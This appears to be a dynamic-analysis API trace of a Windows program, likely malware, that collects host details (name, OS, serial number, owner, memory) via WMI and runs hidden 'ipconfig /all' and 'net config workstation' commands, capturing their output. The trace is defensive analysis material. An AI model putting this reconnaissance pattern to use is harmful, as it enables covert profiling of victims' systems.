	[0218.246] IWbemClassObject:Get (in: This=0x1c8c820, wszName="CSName", lFlags=0, pVal=0x170f760*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x170f760*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ZGW5TDPU", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0218.246] IWbemClassObject:Get (in: This=0x1c8c820, wszName="Caption", lFlags=0, pVal=0x170f750*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x170f750*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Microsoft Windows 7 Professional ", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0218.246] IWbemClassObject:Get (in: This=0x1c8c820, wszName="CSDVersion", lFlags=0, pVal=0x170f740*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x170f740*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Service Pack 1", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0218.246] IWbemClassObject:Get (in: This=0x1c8c820, wszName="OSArchitecture", lFlags=0, pVal=0x170f730*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x170f730*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="32-bit", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0218.246] IWbemClassObject:Get (in: This=0x1c8c820, wszName="ProductType", lFlags=0, pVal=0x170f790*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x170f790*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0218.246] IWbemClassObject:Get (in: This=0x1c8c820, wszName="BuildType", lFlags=0, pVal=0x170f720*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x170f720*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Multiprocessor Free", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0218.246] IWbemClassObject:Get (in: This=0x1c8c820, wszName="WindowsDirectory", lFlags=0, pVal=0x170f710*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x170f710*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0218.246] IWbemClassObject:Get (in: This=0x1c8c820, wszName="SystemDirectory", lFlags=0, pVal=0x170f700*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x170f700*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0218.246] IWbemClassObject:Get (in: This=0x1c8c820, wszName="BootDevice", lFlags=0, pVal=0x170f6f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x170f6f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\Device\\HarddiskVolume1", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0218.246] IWbemClassObject:Get (in: This=0x1c8c820, wszName="SerialNumber", lFlags=0, pVal=0x170f6e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x170f6e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="00371-OEM-8978064-40862", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0218.246] IWbemClassObject:Get (in: This=0x1c8c820, wszName="InstallDate", lFlags=0, pVal=0x170f780*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x170f780*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="20171019122822.000000+000", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0218.246] VarDateFromStr (in: strIn="20171019122822.000000+000", lcid=0x800, dwFlags=0x80000000, pdateOut=0x170f788 | out: pdateOut=0x170f788) returned 0x80020005
	[0218.250] VariantTimeToSystemTime (in: vtime=0x2b6694, lpSystemTime=0x0 | out: lpSystemTime=0x0) returned 1
	[0218.250] IWbemClassObject:Get (in: This=0x1c8c820, wszName="LastBootUpTime", lFlags=0, pVal=0x170f770*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x170f770*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="20190514122923.226432+000", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0218.250] VarDateFromStr (in: strIn="20190514122923.226432+000", lcid=0x800, dwFlags=0x80000000, pdateOut=0x170f778 | out: pdateOut=0x170f778) returned 0x80020005
	[0218.250] VariantTimeToSystemTime (in: vtime=0x2b66dc, lpSystemTime=0x0 | out: lpSystemTime=0x0) returned 1
	[0218.250] IWbemClassObject:Get (in: This=0x1c8c820, wszName="RegisteredUser", lFlags=0, pVal=0x170f6d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x170f6d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="F7dWPzanSah", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0218.250] IWbemClassObject:Get (in: This=0x1c8c820, wszName="Organization", lFlags=0, pVal=0x170f6c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x170f6c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="GhGbtFHB9NFP vlk7C10g6 Hehen9", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0218.250] IWbemClassObject:Get (in: This=0x1c8c820, wszName="TotalVisibleMemorySize", lFlags=0, pVal=0x170f6b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x170f6b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="2096624", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0218.250] IWbemClassObject:Get (in: This=0x1c8c820, wszName="FreePhysicalMemory", lFlags=0, pVal=0x170f6a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x170f6a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="1639540", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0218.250] IUnknown:Release (This=0x1c8c820) returned 0x0
	[0218.250] _vsnwprintf_s (in: _Buffer=0x170ee5c, _BufferCount=0x400, _MaxCount=0x3ff, _Format="Host Name - %s\r\n", _ArgList=0x170f66c | out: _Buffer="Host Name - ZGW5TDPU\r\n") returned 22
	[0218.250] lstrlenW (lpString="Host Name - ZGW5TDPU\r\n") returned 22
	[0218.250] GetProcessHeap () returned 0x270000
	[0218.250] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x766) returned 0x2b84f0
	[0218.250] _vsnwprintf_s (in: _Buffer=0x170ee50, _BufferCount=0x400, _MaxCount=0x3ff, _Format="OS Name - %s\r\n", _ArgList=0x170f660 | out: _Buffer="OS Name - Microsoft Windows 7 Professional \r\n") returned 45
	[0218.250] lstrlenW (lpString="OS Name - Microsoft Windows 7 Professional \r\n") returned 45
	[0218.250] GetProcessHeap () returned 0x270000
	[0218.250] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x2b84f0, Size=0x7c0) returned 0x2b84f0
	[0218.251] _vsnwprintf_s (in: _Buffer=0x170ee44, _BufferCount=0x400, _MaxCount=0x3ff, _Format="OS Version - %s\r\n", _ArgList=0x170f654 | out: _Buffer="OS Version - Service Pack 1\r\n") returned 29
	[0218.251] lstrlenW (lpString="OS Version - Service Pack 1\r\n") returned 29
	[0218.251] GetProcessHeap () returned 0x270000
	[0218.251] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x2b84f0, Size=0x7fa) returned 0x2b84f0
	[0218.251] _vsnwprintf_s (in: _Buffer=0x170ee38, _BufferCount=0x400, _MaxCount=0x3ff, _Format="OS Architecture - %s\r\n", _ArgList=0x170f648 | out: _Buffer="OS Architecture - 32-bit\r\n") returned 26
	[0218.251] lstrlenW (lpString="OS Architecture - 32-bit\r\n") returned 26
	[0218.251] GetProcessHeap () returned 0x270000
	[0218.251] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x2b84f0, Size=0x82e) returned 0x2b84f0
	[0218.251] _vsnwprintf_s (in: _Buffer=0x170ee60, _BufferCount=0x400, _MaxCount=0x3ff, _Format="Product Type - Workstation\r\n", _ArgList=0x170f670 | out: _Buffer="Product Type - Workstation\r\n") returned 28
	[0218.251] lstrlenW (lpString="Product Type - Workstation\r\n") returned 28
	[0218.251] GetProcessHeap () returned 0x270000
	[0218.251] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x2b84f0, Size=0x866) returned 0x2b84f0
	[0218.251] _vsnwprintf_s (in: _Buffer=0x170ee5c, _BufferCount=0x400, _MaxCount=0x3ff, _Format="Build Type - %s\r\n", _ArgList=0x170f66c | out: _Buffer="Build Type - Multiprocessor Free\r\n") returned 34
	[0218.251] lstrlenW (lpString="Build Type - Multiprocessor Free\r\n") returned 34
	[0218.251] GetProcessHeap () returned 0x270000
	[0218.251] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x2b84f0, Size=0x8aa) returned 0x2b84f0
	[0218.251] _vsnwprintf_s (in: _Buffer=0x170ee50, _BufferCount=0x400, _MaxCount=0x3ff, _Format="Registered Owner - %s\r\n", _ArgList=0x170f660 | out: _Buffer="Registered Owner - F7dWPzanSah\r\n") returned 32
	[0218.251] lstrlenW (lpString="Registered Owner - F7dWPzanSah\r\n") returned 32
	[0218.251] GetProcessHeap () returned 0x270000
	[0218.251] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x2b84f0, Size=0x8ea) returned 0x2b84f0
	[0218.251] _vsnwprintf_s (in: _Buffer=0x170ee44, _BufferCount=0x400, _MaxCount=0x3ff, _Format="Registered Organization - %s\r\n", _ArgList=0x170f654 | out: _Buffer="Registered Organization - GhGbtFHB9NFP vlk7C10g6 Hehen9\r\n") returned 57
	[0218.251] lstrlenW (lpString="Registered Organization - GhGbtFHB9NFP vlk7C10g6 Hehen9\r\n") returned 57
	[0218.251] GetProcessHeap () returned 0x270000
	[0218.251] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x2b84f0, Size=0x95c) returned 0x2b84f0
	[0218.251] _vsnwprintf_s (in: _Buffer=0x170ee38, _BufferCount=0x400, _MaxCount=0x3ff, _Format="Serial Number - %s\r\n", _ArgList=0x170f648 | out: _Buffer="Serial Number - 00371-OEM-8978064-40862\r\n") returned 41
	[0218.251] lstrlenW (lpString="Serial Number - 00371-OEM-8978064-40862\r\n") returned 41
	[0218.251] GetProcessHeap () returned 0x270000
	[0218.251] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x2b84f0, Size=0x9ae) returned 0x2b84f0
	[0218.251] _vsnwprintf_s (in: _Buffer=0x170ee18, _BufferCount=0x400, _MaxCount=0x3ff, _Format="Install Date - %02u/%02u/%04u %02d.%02d.%02d\r\n", _ArgList=0x170f628 | out: _Buffer="Install Date - 30/12/1899 00.00.00\r\n") returned 36
	[0218.251] lstrlenW (lpString="Install Date - 30/12/1899 00.00.00\r\n") returned 36
	[0218.251] GetProcessHeap () returned 0x270000
	[0218.251] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x2b84f0, Size=0x9f6) returned 0x2b84f0
	[0218.251] _vsnwprintf_s (in: _Buffer=0x170ee48, _BufferCount=0x400, _MaxCount=0x3ff, _Format="Last Boot Up Time - %02u/%02u/%04u %02d.%02d.%02d\r\n", _ArgList=0x170f658 | out: _Buffer="Last Boot Up Time - 30/12/1899 00.00.00\r\n") returned 41
	[0218.251] lstrlenW (lpString="Last Boot Up Time - 30/12/1899 00.00.00\r\n") returned 41
	[0218.251] GetProcessHeap () returned 0x270000
	[0218.251] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x2b84f0, Size=0xa48) returned 0x2b84f0
	[0218.251] _vsnwprintf_s (in: _Buffer=0x170ee3c, _BufferCount=0x400, _MaxCount=0x3ff, _Format="Windows Directory - %s\r\n", _ArgList=0x170f64c | out: _Buffer="Windows Directory - C:\\Windows\r\n") returned 32
	[0218.251] lstrlenW (lpString="Windows Directory - C:\\Windows\r\n") returned 32
	[0218.251] GetProcessHeap () returned 0x270000
	[0218.251] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x2b84f0, Size=0xa88) returned 0x2b84f0
	[0218.251] _vsnwprintf_s (in: _Buffer=0x170ee30, _BufferCount=0x400, _MaxCount=0x3ff, _Format="System Directory - %s\r\n", _ArgList=0x170f640 | out: _Buffer="System Directory - C:\\Windows\\system32\r\n") returned 40
	[0218.251] lstrlenW (lpString="System Directory - C:\\Windows\\system32\r\n") returned 40
	[0218.251] GetProcessHeap () returned 0x270000
	[0218.251] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x2b84f0, Size=0xad8) returned 0x2b84f0
	[0218.252] _vsnwprintf_s (in: _Buffer=0x170ee24, _BufferCount=0x400, _MaxCount=0x3ff, _Format="Boot Device - %s\r\n", _ArgList=0x170f634 | out: _Buffer="Boot Device - \\Device\\HarddiskVolume1\r\n") returned 39
	[0218.252] lstrlenW (lpString="Boot Device - \\Device\\HarddiskVolume1\r\n") returned 39
	[0218.252] GetProcessHeap () returned 0x270000
	[0218.252] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x2b84f0, Size=0xb26) returned 0x2b84f0
	[0218.252] _vsnwprintf_s (in: _Buffer=0x170ee5c, _BufferCount=0x400, _MaxCount=0x3ff, _Format="\r\nTotal Physical Memory - %d Mb\r\n", _ArgList=0x170f66c | out: _Buffer="\r\nTotal Physical Memory - 2753 Mb\r\n") returned 35
	[0218.252] lstrlenW (lpString="\r\nTotal Physical Memory - 2753 Mb\r\n") returned 35
	[0218.252] GetProcessHeap () returned 0x270000
	[0218.252] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x2b84f0, Size=0xb6c) returned 0x2b84f0
	[0218.252] _vsnwprintf_s (in: _Buffer=0x170ee50, _BufferCount=0x400, _MaxCount=0x3ff, _Format="Available Physical Memory - %d Mb\r\n", _ArgList=0x170f660 | out: _Buffer="Available Physical Memory - 2753 Mb\r\n") returned 37
	[0218.252] lstrlenW (lpString="Available Physical Memory - 2753 Mb\r\n") returned 37
	[0218.252] GetProcessHeap () returned 0x270000
	[0218.252] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x2b84f0, Size=0xbb6) returned 0x2b84f0
	[0218.252] IEnumWbemClassObject:Next (in: This=0x1c8c7e4, lTimeout=-1, uCount=0x1, apObjects=0x170f7b4, puReturned=0x170f7a4 | out: apObjects=0x170f7b4*=0x0, puReturned=0x170f7a4*=0x0) returned 0x1
	[0218.253] _vsnwprintf_s (in: _Buffer=0x170ee60, _BufferCount=0x400, _MaxCount=0x3ff, _Format="\r\n\r\n", _ArgList=0x170f670 | out: _Buffer="\r\n\r\n") returned 4
	[0218.253] lstrlenW (lpString="\r\n\r\n") returned 4
	[0218.253] GetProcessHeap () returned 0x270000
	[0218.253] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x2b84f0, Size=0xbbe) returned 0x2b84f0
	[0218.253] WbemLocator:IUnknown:Release (This=0x1c8c744) returned 0x0
	[0218.253] WbemLocator:IUnknown:Release (This=0x1c80828) returned 0x0
	[0218.253] CreatePipe (in: hReadPipe=0x170f7b4, hWritePipe=0x170f7a4, lpPipeAttributes=0x170f780, nSize=0x0 | out: hReadPipe=0x170f7b4*=0x14c, hWritePipe=0x170f7a4*=0x150) returned 1
	[0218.253] SetHandleInformation (hObject=0x14c, dwMask=0x1, dwFlags=0x0) returned 1
	[0218.253] CreatePipe (in: hReadPipe=0x170f7ac, hWritePipe=0x170f7a8, lpPipeAttributes=0x170f780, nSize=0x0 | out: hReadPipe=0x170f7ac*=0x154, hWritePipe=0x170f7a8*=0x158) returned 1
	[0218.253] SetHandleInformation (hObject=0x158, dwMask=0x1, dwFlags=0x0) returned 1
	[0218.253] GetSystemDirectoryA (in: lpBuffer=0x170f618, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0218.253] lstrcatA (in: lpString1="C:\\Windows\\system32", lpString2="\\cmd.exe" | out: lpString1="C:\\Windows\\system32\\cmd.exe") returned="C:\\Windows\\system32\\cmd.exe"
	[0218.253] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c ipconfig /all", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x170f720*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x154, hStdOutput=0x150, hStdError=0x150), lpProcessInformation=0x170f770 | out: lpCommandLine="/c ipconfig /all", lpProcessInformation=0x170f770*(hProcess=0x160, hThread=0x15c, dwProcessId=0x3ec, dwThreadId=0x208)) returned 1
	[0218.261] wvsprintfA (in: param_1=0x170edf4, param_2="\x09\x09%s\r\n", arglist=0x170f204 | out: param_1="\x09\x09/c ipconfig /all\r\n") returned 20
	[0218.261] GetProcessHeap () returned 0x270000
	[0218.261] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x15) returned 0x29ac30
	[0218.261] PeekNamedPipe (in: hNamedPipe=0x14c, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0218.261] Sleep (dwMilliseconds=0x2710) 
	[0228.541] PeekNamedPipe (in: hNamedPipe=0x14c, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x400, lpTotalBytesAvail=0x170f76c*=0x65f, lpBytesLeftThisMessage=0x0) returned 1
	[0228.542] ReadFile (in: hFile=0x14c, lpBuffer=0x170f218, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x170f7b0, lpOverlapped=0x0 | out: lpBuffer=0x170f218*, lpNumberOfBytesRead=0x170f7b0*=0x400, lpOverlapped=0x0) returned 1
	[0228.542] GetProcessHeap () returned 0x270000
	[0228.542] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29ac30, Size=0x414) returned 0x29a0b0
	[0228.542] PeekNamedPipe (in: hNamedPipe=0x14c, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x25f, lpTotalBytesAvail=0x170f76c*=0x25f, lpBytesLeftThisMessage=0x0) returned 1
	[0228.542] ReadFile (in: hFile=0x14c, lpBuffer=0x170f218, nNumberOfBytesToRead=0x25f, lpNumberOfBytesRead=0x170f7b0, lpOverlapped=0x0 | out: lpBuffer=0x170f218*, lpNumberOfBytesRead=0x170f7b0*=0x25f, lpOverlapped=0x0) returned 1
	[0228.542] GetProcessHeap () returned 0x270000
	[0228.542] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x673) returned 0x29a0b0
	[0228.542] PeekNamedPipe (in: hNamedPipe=0x14c, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0228.542] wvsprintfA (in: param_1=0x170edf8, param_2="\r\n\r\n", arglist=0x170f208 | out: param_1="\r\n\r\n") returned 4
	[0228.542] GetProcessHeap () returned 0x270000
	[0228.542] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x677) returned 0x29a0b0
	[0228.542] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x29a0b0, cbMultiByte=1655, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1655
	[0228.542] GetProcessHeap () returned 0x270000
	[0228.542] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xcee) returned 0x2b98b8
	[0228.542] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x29a0b0, cbMultiByte=1655, lpWideCharStr=0x2b98b8, cchWideChar=1655 | out: lpWideCharStr="\x09\x09/c ipconfig /all\r\n\r\nWindows IP Configuration\r\n\r\n   Host Name . . . . . . . . . . . . : ZgW5tdPu\r\n   Primary Dns Suffix  . . . . . . . : \r\n   Node Type . . . . . . . . . . . . : Hybrid\r\n   IP Routing Enabled. . . . . . . . : No\r\n   WINS Proxy Enabled. . . . . . . . : No\r\n\r\nEthernet adapter Local Area Connection:\r\n\r\n   Connection-specific DNS Suffix  . : \r\n   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection\r\n   Physical Address. . . . . . . . . : 00-0A-91-6E-33-D9\r\n   DHCP Enabled. . . . . . . . . . . : Yes\r\n   Autoconfiguration Enabled . . . . : Yes\r\n   Link-local IPv6 Address . . . . . : fe80::9594:91b6:d807:49d3%11(Preferred) \r\n   IPv4 Address. . . . . . . . . . . : 192.168.0.251(Preferred) \r\n   Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n   Lease Obtained. . . . . . . . . . : Tuesday, May 14, 2019 3:30:31 PM\r\n   Lease Expires . . . . . . . . . . : Tuesday, May 14, 2019 4:30:30 PM\r\n   Default Gateway . . . . . . . . . : 192.168.0.1\r\n   DHCP Server . . . . . . . . . . . : 192.168.0.1\r\n   DHCPv6 IAID . . . . . . . . . . . : 234938623\r\n   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-21-7A-B4-D4-00-E0-FF-8A-6A-66\r\n   DNS Servers . . . . . . . . . . . : 192.168.0.1\r\n   NetBIOS over Tcpip. . . . . . . . : Enabled\r\n\r\nTunnel adapter isatap.{D303B40D-CBB0-4CD4-933A-0697F06EA7C1}:\r\n\r\n   Media State . . . . . . . . . . . : Media disconnected\r\n   Connection-specific DNS Suffix  . : \r\n   Description . . . . . . . . . . . : Microsoft ISATAP Adapter\r\n   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0\r\n   DHCP Enabled. . . . . . . . . . . : No\r\n   Autoconfiguration Enabled . . . . : Yes\r\n\r\n\r\nl莩⏗ᵎ") returned 1655
	[0228.542] GetProcessHeap () returned 0x270000
	[0228.542] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x2b84f0, Size=0x18ac) returned 0x2ba5b0
	[0228.543] GetProcessHeap () returned 0x270000
	[0228.543] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x2b98b8 | out: hHeap=0x270000) returned 1
	[0228.543] GetProcessHeap () returned 0x270000
	[0228.543] HeapFree (in: hHeap=0x270000, dwFlags=0x8, lpMem=0x29a0b0 | out: hHeap=0x270000) returned 1
	[0228.543] CloseHandle (hObject=0x154) returned 1
	[0228.543] CloseHandle (hObject=0x158) returned 1
	[0228.543] CloseHandle (hObject=0x14c) returned 1
	[0228.543] CloseHandle (hObject=0x150) returned 1
	[0228.543] CloseHandle (hObject=0x15c) returned 1
	[0228.543] CloseHandle (hObject=0x160) returned 1
	[0228.543] CreatePipe (in: hReadPipe=0x170f7b4, hWritePipe=0x170f7a4, lpPipeAttributes=0x170f780, nSize=0x0 | out: hReadPipe=0x170f7b4*=0x160, hWritePipe=0x170f7a4*=0x15c) returned 1
	[0228.543] SetHandleInformation (hObject=0x160, dwMask=0x1, dwFlags=0x0) returned 1
	[0228.543] CreatePipe (in: hReadPipe=0x170f7ac, hWritePipe=0x170f7a8, lpPipeAttributes=0x170f780, nSize=0x0 | out: hReadPipe=0x170f7ac*=0x150, hWritePipe=0x170f7a8*=0x14c) returned 1
	[0228.544] SetHandleInformation (hObject=0x14c, dwMask=0x1, dwFlags=0x0) returned 1
	[0228.544] GetSystemDirectoryA (in: lpBuffer=0x170f618, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0228.544] lstrcatA (in: lpString1="C:\\Windows\\system32", lpString2="\\cmd.exe" | out: lpString1="C:\\Windows\\system32\\cmd.exe") returned="C:\\Windows\\system32\\cmd.exe"
	[0228.544] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c net config workstation", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x170f720*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x150, hStdOutput=0x15c, hStdError=0x15c), lpProcessInformation=0x170f770 | out: lpCommandLine="/c net config workstation", lpProcessInformation=0x170f770*(hProcess=0x154, hThread=0x158, dwProcessId=0xa50, dwThreadId=0x318)) returned 1
	[0228.551] wvsprintfA (in: param_1=0x170edf4, param_2="\x09\x09%s\r\n", arglist=0x170f204 | out: param_1="\x09\x09/c net config workstation\r\n") returned 29
	[0228.551] GetProcessHeap () returned 0x270000
	[0228.551] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1e) returned 0x2b01d0
	[0228.551] PeekNamedPipe (in: hNamedPipe=0x160, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
	[0228.551] Sleep (dwMilliseconds=0x2710) 
	[0239.102] PeekNamedPipe (in: hNamedPipe=0x160, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x244, lpTotalBytesAvail=0x170f76c*=0x244, lpBytesLeftThisMessage=0x0) returned 1
	[0239.103] ReadFile (in: hFile=0x160, lpBuffer=0x170f218, nNumberOfBytesToRead=0x244, lpNumberOfBytesRead=0x170f7b0, lpOverlapped=0x0 | out: lpBuffer=0x170f218*, lpNumberOfBytesRead=0x170f7b0*=0x244, lpOverlapped=0x0) returned 1
	[0239.103] GetProcessHeap () returned 0x270000
	[0239.103] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x2b01d0, Size=0x261) returned 0x29a0b0
	[0239.103] PeekNamedPipe (in: hNamedPipe=0x160, lpBuffer=0x170f218, nBufferSize=0x400, lpBytesRead=0x170f7b0, lpTotalBytesAvail=0x170f76c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x170f218*, lpBytesRead=0x170f7b0*=0x0, lpTotalBytesAvail=0x170f76c*=0x0, lpBytesLeftThisMessage=0x0) returned 1
